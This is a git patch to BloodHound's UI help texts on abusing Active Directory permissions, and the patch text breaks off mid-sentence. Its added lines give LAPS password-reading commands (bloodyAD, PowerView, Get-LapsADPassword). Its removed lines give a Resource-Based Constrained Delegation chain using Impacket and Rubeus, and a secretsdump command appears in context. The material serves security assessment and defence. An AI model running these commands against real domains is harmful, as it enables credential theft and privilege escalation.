From 2351e5c19290ec8fe2ac4c986c67912260f68af5 Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 16 Dec 2024 11:23:58 +0100 Subject: [PATCH 1/4] fix retrieve LAPS helptext Cover Windows LAPS, remove non-LAPS computer abuses for AllExtendedRights, remove LAPS abuse for domain nodes. --- .../AllExtendedRights/LinuxAbuse.tsx | 140 +++----------- .../AllExtendedRights/References.tsx | 12 +- .../AllExtendedRights/WindowsAbuse.tsx | 175 ++++-------------- .../HelpTexts/GenericAll/LinuxAbuse.tsx | 59 +++--- .../HelpTexts/GenericAll/References.tsx | 12 ++ .../HelpTexts/GenericAll/WindowsAbuse.tsx | 48 ++++- .../components/HelpTexts/Owns/LinuxAbuse.tsx | 62 ++++--- .../components/HelpTexts/Owns/References.tsx | 12 ++ .../HelpTexts/Owns/WindowsAbuse.tsx | 48 ++++- .../HelpTexts/ReadLAPSPassword/General.tsx | 15 +- .../HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx | 19 +- .../HelpTexts/ReadLAPSPassword/References.tsx | 14 +- .../ReadLAPSPassword/WindowsAbuse.tsx | 32 ++-- .../HelpTexts/WriteDacl/LinuxAbuse.tsx | 61 +++--- .../HelpTexts/WriteDacl/References.tsx | 12 ++ .../HelpTexts/WriteDacl/WindowsAbuse.tsx | 48 ++++- .../HelpTexts/WriteOwner/LinuxAbuse.tsx | 61 +++--- .../HelpTexts/WriteOwner/References.tsx | 12 ++ .../HelpTexts/WriteOwner/WindowsAbuse.tsx | 48 ++++- 19 files changed, 462 insertions(+), 428 deletions(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx index ffe3312489..8f6eba5fdf 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx @@ -57,116 +57,46 @@ const LinuxAbuse: FC = ({ sourceName, targ ); case 'Computer': - if (haslaps) { return ( <> - The AllExtendedRights permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. - - - - Alternatively, AllExtendedRights on a computer object can be used to perform a - Resource-Based Constrained Delegation attack. - - - Retrieve LAPS Password - - The AllExtendedRights permission grants {sourceName} the ability to obtain the RID 500 - administrator password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. - - - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Resource-Based Constrained Delegation - - First, if an attacker does not control an account with an SPN set, a new attacker-controlled - computer account can be added with Impacket's addcomputer.py example script: - - - { - "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'" - } + The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - We now need to configure the target object so that the attacker-controlled computer can - delegate to it. Impacket's rbcd.py script can be used for that purpose: - - - { - "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'" - } + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
- And finally we can get a service ticket for the service name (sname) we want to "pretend" to - be "admin" for. Impacket's getST.py example script can be used for that purpose. + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - { - "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'" - } + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} - This ticket can then be used with Pass-the-Ticket, and could grant access to the file system - of the TARGETCOMPUTER. + See Windows abuse for retrieving and decrypting the encrypted attributes. ); - } else { - return ( - <> - - AllExtendedRights on a computer object can be used to perform a Resource-Based Constrained - Delegation attack. - - - Resource-Based Constrained Delegation - - First, if an attacker does not control an account with an SPN set, a new attacker-controlled - computer account can be added with Impacket's addcomputer.py example script: - - - { - "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'" - } - - - We now need to configure the target object so that the attacker-controlled computer can - delegate to it. Impacket's rbcd.py script can be used for that purpose: - - - { - "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'" - } - - - And finally we can get a service ticket for the service name (sname) we want to "pretend" to - be "admin" for. Impacket's getST.py example script can be used for that purpose. - - - { - "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'" - } - - - This ticket can then be used with Pass-the-Ticket, and could grant access to the file system - of the TARGETCOMPUTER. - - - ); - } case 'Domain': return ( <> @@ -185,24 +115,6 @@ const LinuxAbuse: FC = ({ sourceName, targ {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"} - - Retrieve LAPS Passwords - - - The AllExtendedRights permission also grants {sourceName} enough privileges, to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - ); case 'CertTemplate': diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx index c51284042d..c7380492d4 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx @@ -42,12 +42,16 @@ const References: FC = () => { https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
- - https://www.thehacker.recipes/ad/movement/dacl/readlapspassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://eladshamir.com/2019/01/28/Wagging-the-Dog.html + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD
= ({ @@ -88,167 +88,54 @@ const WindowsAbuse: FC = ({ ); case 'Computer': - if (haslaps) { return ( <> - The AllExtendedRights permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - - Alternatively, AllExtendedRights on a computer object can be used to perform a - Resource-Based Constrained Delegation attack. - - - Resource-Based Constrained Delegation attack - - - Abusing this primitive is possible through the Rubeus project. - - - - First, if an attacker does not control an account with an SPN set, Kevin Robertson's - Powermad project can be used to add a new attacker-controlled computer account: - - - - { - "New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)" - } - - - - PowerView can be used to then retrieve the security identifier (SID) of the newly created - computer account: - - - - $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand - objectsid - - - - We now need to build a generic ACE with the attacker-added computer SID as the principal, - and get the binary bytes for the new DACL/ACE: - - - - {'$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"\n' + - '$SDBytes = New-Object byte[] ($SD.BinaryLength)\n' + - '$SD.GetBinaryForm($SDBytes, 0)'} - - - - Next, we need to set this newly created security descriptor in the - msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, - again using PowerView in this case: - - - - { - "Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}" - } - - - - We can then use Rubeus to hash the plaintext password into its RC4_HMAC form: - - - {'Rubeus.exe hash /password:Summer2018!'} - - And finally we can use Rubeus' *s4u* module to get a service ticket for the service name - (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), - and in this case grants us access to the file system of the TARGETCOMPUTER: + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
- - - { - 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' - } - - - ); - } else { - return ( - <> - - AllExtendedRights on a computer object can be used to perform a Resource-Based Constrained - Delegation attack. - - - - Abusing this primitive is possible through the Rubeus project. - - - - First, if an attacker does not control an account with an SPN set, Kevin Robertson's - Powermad project can be used to add a new attacker-controlled computer account: - - - - { - "New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)" - } - - - - PowerView can be used to then retrieve the security identifier (SID) of the newly created - computer account: - - - - $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand - objectsid + + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
- - We now need to build a generic ACE with the attacker-added computer SID as the principal, - and get the binary bytes for the new DACL/ACE: + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - - {'$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"\n' + - '$SDBytes = New-Object byte[] ($SD.BinaryLength)\n' + - '$SD.GetBinaryForm($SDBytes, 0)'} + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} - - Next, we need to set this newly created security descriptor in the - msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, - again using PowerView in this case: + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - { - "Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}" - } + {'Get-LapsADPassword "WIN10" -AsPlainText'} - - - We can then use Rubeus to hash the plaintext password into its RC4_HMAC form: - - - {'Rubeus.exe hash /password:Summer2018!'} - - And finally we can use Rubeus' *s4u* module to get a service ticket for the service name - (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), - and in this case grants us access to the file system of the TARGETCOMPUTER: - - - - { - 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' - } - + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). +
); - } case 'Domain': return ( diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx index 3928fcedc1..84d60352ba 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx @@ -163,21 +163,42 @@ const LinuxAbuse: FC = ( Retrieve LAPS Password Full control of a computer object is abusable when the computer's local admin account - credential is controlled with LAPS. The clear-text password for the local administrator - account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With - full control of the computer object, you may have the ability to read this attribute, or - grant yourself the ability to read the attribute by modifying the computer object's security - descriptor. + credential is controlled with LAPS. - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled computer account can be added with Impacket's addcomputer.py example script: @@ -325,24 +346,6 @@ const LinuxAbuse: FC = ( {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"}
- Retrieve LAPS Passwords - - - The AllExtendedRights permission also grants {sourceName} enough permissions, to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Generic Descendent Object Takeover The simplest and most straight forward way to obtain control of the objects of the domain is to diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx index aa69acf771..5384d4bd4a 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx @@ -168,6 +168,18 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx index a3fe7b33c0..6eb7f1e593 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx @@ -215,10 +215,7 @@ const WindowsAbuse: FC = <> The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + administrator) password of {targetName}. @@ -233,6 +230,49 @@ const WindowsAbuse: FC = Constrained Delegation attack. + Retrieve LAPS Password + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). + + Shadow Credentials attack To abuse the permission, use Whisker. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx index e5095855a6..18136f7bda 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx @@ -227,24 +227,45 @@ const LinuxAbuse: FC = ( "dacledit.py -action 'remove' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'" }
+ Retrieve LAPS Password - Full control of a computer object is abusable when the computer's local admin account - credential is controlled with LAPS. The clear-text password for the local administrator - account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With - full control of the computer object, you may have the ability to read this attribute, or - grant yourself the ability to read the attribute by modifying the computer object's security - descriptor. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. + + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
- - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled @@ -412,25 +433,6 @@ const LinuxAbuse: FC = ( {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"} - Retrieve LAPS Passwords - - - If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the - AllExtendedRights permission included grants {sourceName} enough privileges to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Generic Descendent Object Takeover The simplest and most straight forward way to obtain control of the objects of the domain is to diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx index 47864ed953..a03165c467 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx @@ -143,6 +143,18 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx index 49cadd9a4c..49374da97f 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx @@ -307,10 +307,7 @@ const WindowsAbuse: FC = The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + administrator) password of {targetName}. @@ -325,6 +322,49 @@ const WindowsAbuse: FC = Constrained Delegation attack. + Retrieve LAPS Password + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). + + Shadow Credentials attack To abuse the permission, use Whisker. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx index 85e2e77a15..2442949f49 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx @@ -27,8 +27,19 @@ const General: FC = ({ sourceName, sourceType, targetName }) => { Password Solution (LAPS) on the computer {targetName}.
- The local administrator password for a computer managed by LAPS is stored in the confidential LDAP - attribute, "ms-mcs-AdmPwd". + For systems using legacy LAPS, the following AD computer object properties are relevant: + - **ms-Mcs-AdmPwd**: The plaintext LAPS password. + - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password expiration time. + + + + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + - **msLAPS-Password**: The plaintext LAPS password. + - **msLAPS-PasswordExpirationTime**: The LAPS password expiration time. + - **msLAPS-EncryptedPassword**: The encrypted LAPS password. + - **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. + - **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. + - **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history. ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx index 74e973476b..d29cc06d31 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx @@ -14,7 +14,7 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Link, Typography } from '@mui/material'; +import { Typography } from '@mui/material'; import { FC } from 'react'; import { EdgeInfoProps } from '../index'; @@ -22,20 +22,17 @@ const LinuxAbuse: FC = () => { return ( <> - Sufficient control on a computer object is abusable when the computer's local admin account credential - is controlled with LAPS. The clear-text password for the local administrator account is stored in an - extended attribute on the computer object called ms-Mcs-AdmPwd. + Read the LAPS password attributes listed in the General section. - - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + + See Windows abuse for retrieving and decrypting the encrypted attributes. ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx index 6d25700ccb..5d4fbd1b43 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx @@ -30,9 +30,19 @@ const References: FC = () => { https://adsecurity.org/?p=3164 - - https://www.thehacker.recipes/ad/movement/dacl/readlapspassword +
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt +
+ + https://github.com/CravateRouge/bloodyAD + +
); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx index 10863478f8..bb0f6edb9c 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx @@ -15,35 +15,33 @@ // SPDX-License-Identifier: Apache-2.0 import { FC } from 'react'; -import { Typography } from '@mui/material'; +import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; -const WindowsAbuse: FC = ({ sourceName, sourceType }) => { +const WindowsAbuse: FC = () => { return ( <> - To abuse this permission with PowerView's Get-DomainObject, first import PowerView into your agent - session or into a PowerShell instance at the console. You may need to authenticate to the Domain - Controller as{' '} - {sourceType === 'User' - ? `${sourceName} if you are not running a process as that user` - : `a member of ${sourceName} if you are not running a process as a member`} - . To do this in conjunction with Get-DomainObject, first create a PSCredential object (these examples - comes from the PowerView help documentation): + Read the LAPS password attributes listed in the General section. + + + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - - {"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" + - "$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"} + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} - Then, use Get-DomainObject, optionally specifying $Cred if you are not already running a process as{' '} - {sourceName}: + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-DomainObject windows1 -Credential $Cred -Properties "ms-mcs-AdmPwd",name'} + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx index c4da952800..ecee39a884 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx @@ -230,22 +230,42 @@ const LinuxAbuse: FC = ( Retrieve LAPS Password - Full control of a computer object is abusable when the computer's local admin account - credential is controlled with LAPS. The clear-text password for the local administrator - account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With - full control of the computer object, you may have the ability to read this attribute, or - grant yourself the ability to read the attribute by modifying the computer object's security - descriptor. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + For systems using 